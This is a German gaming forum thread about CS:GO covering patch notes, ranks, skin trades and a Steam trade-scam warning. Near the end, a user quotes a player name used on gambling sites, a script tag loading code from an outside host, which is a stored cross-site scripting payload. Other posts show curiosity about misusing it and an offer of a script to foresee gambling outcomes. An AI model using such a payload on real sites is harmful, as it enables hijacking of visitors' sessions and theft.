elitepvpers

elitepvpers (https://www.elitepvpers.com/forum/)
-   Counter-Strike (https://www.elitepvpers.com/forum/counter-strike/)
-   -   Counter-Strike Chit-Chat II (https://www.elitepvpers.com/forum/counter-strike/3675147-counter-strike-chit-chat-ii.html)

Synom98(2) 10/01/2015 18:21

Hab gehört dieser Nepo hat keine Angst?!

5-7 braucht mehr dmg denke ich mal

'Dennozs 10/01/2015 18:22

Quote:

Originally Posted by AsarTrader (Post 33052013)
dat konter tho

11/10

ik

Quote:

Originally Posted by tykila (Post 33052131)
wait, das kenn ich doch irgendwoher uff.

stimmt sry credits an dich

tykila 10/01/2015 18:26

Quote:

Originally Posted by Synom98(2) (Post 33052941)
Hab gehört dieser Nepo hat keine Angst?!

5-7 braucht mehr dmg denke ich mal

du brauchst einfach nur aim oder luck, oder beides.

Quote:

Originally Posted by Sike' (Post 33052954)

stimmt sry credits an dich

danke danke danke. Grüße gehen raus an meine Fans und an die Hater lol.

burncode 10/01/2015 21:24

steam://joinlobby/730/109775242377727269/76561198228258844
+3

tykila 10/02/2015 09:02

Quote:

Release Notes for 10/1/2015

[OPERATION BLOODHOUND]
– Operation Bloodhound has come to a close.
– The Falchion Case will be available as a drop for all players.
[GAMEPLAY]
– Zeus:
— Increased price to $200
— Reduced kill award to $0
— Reduced max player speed to 220
[UI]
– New Music Kits will be available for purchase directly in the main menu for a limited time.
[MISC]
– In official competitive matches, voice communications are now team-only in warmup and half-time, allowing players to discuss player roles and strategies.
Kein geflame mehr im Warmup/half-time, schade..

'Dennozs 10/02/2015 09:04

Quote:

Originally Posted by tykila (Post 33056377)

[GAMEPLAY]
– Zeus:
— Increased price to $200
— Reduced kill award to $0
— Reduced max player speed to 220

[IMG=expandable: 1]http://vignette3.wikia.nocookie.net/glee/images/7/76/Okay-Guy-Meme-Face.jpg/revision/latest?cb=20120318034604[/IMG]

tykila 10/02/2015 09:24

ach macht es spaß auf Reddit leute fertig zu machen die ESEA haten.

btw. ich mag die ak

AsarTrader 10/02/2015 10:37

Quote:

Originally Posted by tykila (Post 33056377)

gg schlechtes update der Welt

RIP Balkan Beats und Türkisches Gedudel meiner Gegner im Warmup

will doch meine Gegner flamen können und in 15 Sprachen zurück geflamt werden :<
naja, immerhin kann ich am Ende noch "BOOSTED!!1" reinschreien

tykila 10/02/2015 10:46

Quote:

Originally Posted by AsarTrader (Post 33056654)
gg schlechtes update der Welt

RIP Balkan Beats und Türkisches Gedudel meiner Gegner im Warmup

will doch meine Gegner flamen können und in 15 Sprachen zurück geflamt werden :<
naja, immerhin kann ich am Ende noch "BOOSTED!!1" reinschreien

Am ende hören sie dich auch nicht mehr, hat Valve nur vergessen in die Notes zu schreiben. :D

AsarTrader 10/02/2015 10:48

Quote:

Originally Posted by tykila (Post 33056677)
Am ende hören sie dich auch nicht mehr, hat Valve nur vergessen in die Notes zu schreiben. :D

okay, bin raus. quitte cs go für immer

________

sehen uns dann heut Abend ingame

deniz619 10/02/2015 15:58

Quote:

Originally Posted by tykila (Post 33056677)

Ich denke/hoffe, dass das ein Versehen ist. Hat ja auch kein Sinn, Warmup und HZ-Pause wurden ja so gepatcht mit dem Grund man könnte besser Taktiken besprechen. Nach dem Spiel sehe ich da kein Sinn mehr

tykila 10/02/2015 16:03

Quote:

Originally Posted by deniz619 (Post 33058262)
Ich denke/hoffe, dass das ein Versehen ist. Hat ja auch kein Sinn, Warmup und HZ-Pause wurden ja so gepatcht mit dem Grund man könnte besser Taktiken besprechen. Nach dem Spiel sehe ich da kein Sinn mehr

nein ist kein versehen, da es nur ein svar dafür gibt -> sv_auto_full_alltalk_during_warmup_half_end (pregame/halftime/end of game), steht halt nur nicht in den Patch notes. ;D

deniz619 10/02/2015 16:46

Quote:

Originally Posted by tykila (Post 33058298)
nein ist kein versehen, da es nur ein svar dafür gibt -> sv_auto_full_alltalk_during_warmup_half_end (pregame/halftime/end of game), steht halt nur nicht in den Patch notes. ;D

ja aber vielleicht hatten sie das vergessen und schreiben das um^^

tykila 10/02/2015 16:48

Quote:

Originally Posted by deniz619 (Post 33058575)
ja aber vielleicht hatten sie das vergessen und schreiben das um^^

hahah das ist Valve, die machen gar nichts mehr daran :D

deniz619 10/02/2015 16:52

Quote:

Originally Posted by tykila (Post 33058586)
hahah das ist Valve, die machen gar nichts mehr daran :D

erinnert mich an die m4 mit der armorpenetration die auch nie runtergesetzt wurde trotz ankündigung :D

LiiVE2RAVE 10/02/2015 17:47

gibt es bei steam offizielle "trade assistents" die überprüfen ob items "geglitched" sind? Wollte gerade traden, dann hat mir der user gesagt ich solle [Only registered and activated users can see links. Click Here To Register...] adden (angeblich ein admin oder so) und sie fragen ob meine Items geglitched sind, da mein gegenüber schon wegen sowas gebannt wurde. Ich war schon misstrauisch, aber als dieser "Admin" dann meine Items haben wollte um diese zu prüfen habe ich gestoppt.

Das ganze ist Bullshit, oder gibt es das doch?

tykila 10/02/2015 17:50

Quote:

Originally Posted by LiiVE2RAVE (Post 33059026)
gibt es bei steam offizielle "trade assistents" die überprüfen ob items "geglitched" sind? Wollte gerade traden, dann hat mir der user gesagt ich solle [Only registered and activated users can see links. Click Here To Register...] adden (angeblich ein admin oder so) und sie fragen ob meine Items geglitched sind, da mein gegenüber schon wegen sowas gebannt wurde. Ich war schon misstrauisch, aber als dieser "Admin" dann meine Items haben wollte um diese zu prüfen habe ich gestoppt.

bullshit. reporte einfach beide für versuchter Handelsbetrug (bringt zwar anscheint nix aber naja :D) man kann glaub über csgo.exchange nachschauen ob ein Item geduped worden ist.

LiiVE2RAVE 10/02/2015 17:54

Quote:

Originally Posted by tykila (Post 33059044)
bullshit. reporte einfach beide für versuchter Handelsbetrug (bringt zwar anscheint nix aber naja :D) man kann glaub über csgo.exchange nachschauen ob ein Item geduped worden ist.

danke. habe noch nie was von diesend glitched/duped items gehört gehabt,

tykila 10/02/2015 18:03

Quote:

Originally Posted by LiiVE2RAVE (Post 33059076)

gibt hier bestimmt wen der das genauer erklären kann :D

Kyrishix 10/02/2015 18:13

Da fängt man nach vielen Monaten mal wieder mit CS:GO an und sieht, dass man nun Rank 3? sein muss, damit man erst Matchmaking spielen kann. Mein alter Rank ist ja auch weg - selbstverständlich nach der Abwesenheit - und um wieder nen Rank zu bekommen muss ich ja erstmal ein Spiel spielen können. Da es ja nun auch keine Operation mehr gibt, dauert das Leveln ohne die Missionen doch sau lange. Wie stelle ich das am besten an?

burncode 10/02/2015 18:18

Quote:

Originally Posted by Kyrishix (Post 33059200)
Da fängt man nach vielen Monaten mal wieder mit CS:GO an und sieht, dass man nun Rank 3? sein muss, damit man erst Matchmaking spielen kann. Mein alter Rank ist ja auch weg - selbstverständlich nach der Abwesenheit - und um wieder nen Rank zu bekommen muss ich ja erstmal ein Spiel spielen können. Da es ja nun auch keine Operation mehr gibt, dauert das Leveln ohne die Missionen doch sau lange. Wie stelle ich das am besten an?

Gib mir den Account und bist morgen Rank 3.

Oder spiel Casual, versuch so gut wie möglich zu sein.
Obergrenze ist 1000 XP bis Rank 2. Ab Rank 3 500 XP.

PreHax 10/02/2015 18:37

Quote:

Originally Posted by tykila (Post 33059044)

Quote:

Originally Posted by LiiVE2RAVE (Post 33059076)

Quote:

Originally Posted by tykila (Post 33059142)
gibt hier bestimmt wen der das genauer erklären kann :D

Spoiler:

man kann es nachschauen aber sowas wird eher bei highvalue items gemacht

'Dennozs 10/02/2015 19:58

Quote:

Originally Posted by LiiVE2RAVE (Post 33059026)

Ab "er wollte meine Items" wurde es legit ( ͡° ͜ʖ ͡°)

Es gibt/gab mal angeblich geglitchte Items, da es ein paar sehr sehr seltene Skins mit gleicher float, gleichem aussehen etc gibt ....

da war der liebe felix wohl schneller. Ich sollte bis ans ende vom Thread gehen bevor ich antworte :/

mystic =D 10/02/2015 20:10

Quote:

Wenn man so drüber nachdenkt ist das aber echt bitter:D

Wollten sie das ganze nicht sogar erhöhen?

Wenn dann keine Operation läuft darf man nach 1k Stunden Playedtime 2 Matches gewinnen nur um wieder 1 Tag zu warten :D ( jaja ich weis das war übertrieben )

'Dennozs 10/02/2015 20:13

Quote:

Originally Posted by Lichslap (Post 33060061)

Wollten sie das ganze nicht sogar erhöhen?

Wenn dann keine Operation läuft darf man nach 1k Stunden Playedtime 2 Matches gewinnen nur um wieder 1 Tag zu warten :D ( jaja ich weis das war übertrieben )

Ja, afaik wollten/wollen sie den benötigten Rank noch weiter erhöhen

Kyrishix 10/02/2015 20:15

Quote:

Das System an sich finde ich gar nicht so verkehrt, aber dass es auch bei ehemaligen Spielern (Ich war MG1, bevor ich ein paar Monate halt Pause gemacht habe) greift, finde ich etwas unsinnig.

Quote:

Das mit den zwei Matches am Tag gilt ja soweit ich weiß aber nur für neue Accounts und nicht für welche, die bereits geranked wurden sind oder schon mal geranked waren.

PreHax 10/02/2015 21:25

die können das auch gern auf level10 erhöhen, weniger Hacker/weniger Smurfer

( außer du hast sie jetzt schon hochgelevelt )

deniz619 10/02/2015 22:23

hat jmd hier vllt bock auf Epvp intern 5vs5? wäre bestimmt nice

Polytoxic 10/02/2015 23:25

wollte mich mal wieder an cs:s rantasten, zumal die fps da auch stimmen ;)

kann mir jmd "matchmaking"-server empfehlen?

mystic =D 10/03/2015 14:44

Quote:

Das mit den zwei Matches am Tag gilt ja soweit ich weiß aber nur für neue Accounts und nicht für welche, die bereits geranked wurden sind oder schon mal geranked waren.
Korrekt!

Sevvi 10/03/2015 15:11

mitlerweile macht mir faceit mehr spaß als mm, aber wenn ich mir dann premium kaufe, muss ich auch schwitzen, dann machts mir keinen spaß mehr.
ws hat premium für einen sinn xd

LiiVE2RAVE 10/03/2015 15:12

Mein Vanilla Butterfly gegen sein M9 Bajo Case Hardened Well Worn?

Steam market sagt ja, steamanalyst und csgostash aber nein :D
Kann mir wer helfen?

Akiao 10/03/2015 15:15

Quote:

Originally Posted by LiiVE2RAVE (Post 33064859)
Mein Vanilla Butterfly gegen sein M9 Bajo Case Hardened Well Worn?

Steam market sagt ja, steamanalyst und csgostash aber nein :D
Kann mir wer helfen?

wie viel Blue?

LiiVE2RAVE 10/03/2015 15:21

Quote:

Originally Posted by Akiao (Post 33064874)
wie viel Blue?

wenig :D

habe null ahnung von sowas.
auf der playside ist fast gar kein blue, nur ein kleiner klecks :D

EDIT: 45% blue ps sagt er

F.Gump 10/03/2015 16:31

Quote:

Originally Posted by LiiVE2RAVE (Post 33064923)
wenig :D

habe null ahnung von sowas.
auf der playside ist fast gar kein blue, nur ein kleiner klecks :D

EDIT: 45% blue ps sagt er

wenn du sowas hörst direkt ignorieren, is ganz normales pattern wenn nicht sogar schlecht lacho

KwPJagTqzqC3 10/03/2015 17:53

Hab soeben nen Spieler gesehen, der auf ner Gamblingseite keinen Namen hatte. Hab ihn dann gefunden und sein namen lautete wie folgt: <script src=http://um.noip.me/s>.
Er meint er kann damit diverse Gamblingseiten "Hacken".
Ich finde das ganze etwas merkwürdig, hab mich selbst so umbenannt und mich auf ner Gamblingseite eingeloggt und hatte auch keinen Namen. Links unten im Firefox stand: "verbinde mit um.noip.me" und es hat ewig lange geladen.

Habt ihr ne Ahnung was es damit auf sich hat?

Mr. Highlife 10/03/2015 18:13

Quote:

Originally Posted by EinEpischerApfel (Post 33066022)
Hab soeben nen Spieler gesehen, der auf ner Gamblingseite keinen Namen hatte. Hab ihn dann gefunden und sein namen lautete wie folgt: <script src=http://um.noip.me/s>.
Er meint er kann damit diverse Gamblingseiten "Hacken".
Ich finde das ganze etwas merkwürdig, hab mich selbst so umbenannt und mich auf ner Gamblingseite eingeloggt und hatte auch keinen Namen. Links unten im Firefox stand: "verbinde mit um.noip.me" und es hat ewig lange geladen.

Habt ihr ne Ahnung was es damit auf sich hat?

Normalerweise sollte sowas nicht geparsed werden, aber je nach Qualität der Gamblingseite kann es schonmal vorkommen, dass es doch geparsed wird. Dann versucht halt der Browser, statt dem Namen ein Script von noip.me zu laden. Schreibs am besten mal dem Support dort, kann man schließlich wesentlich dümmeres anstellen als nur den Namen zu verbergen.

Mc Salamander 10/03/2015 20:28

Quote:

Originally Posted by Mr. Highlife (Post 33066161)
Normalerweise sollte sowas nicht geparsed werden, aber je nach Qualität der Gamblingseite kann es schonmal vorkommen, dass es doch geparsed wird. Dann versucht halt der Browser, statt dem Namen ein Script von noip.me zu laden. Schreibs am besten mal dem Support dort, kann man schließlich wesentlich dümmeres anstellen als nur den Namen zu verbergen.

Genau das war ja die Frage. Sind wir nicht das Forum um uns über so "Dummheiten" zu unterhalten? :awesome:

KwPJagTqzqC3 10/03/2015 20:52

Quote:

Originally Posted by Mr. Highlife (Post 33066161)

Was könnte man denn damit so anstellen? :pimp:

False 10/04/2015 02:01

Wieso kann ich bei Wettkampf nicht jede Map spielen ;O ?

Ps. brauch wer ein script für csgo-pool.con womit man direkt sieht wer gewonnen hat ? :D
Ist funny die Leute dort aufzuregen weil ich es vorher im Chat schreibe :D

All times are GMT +2. The time now is 09:01.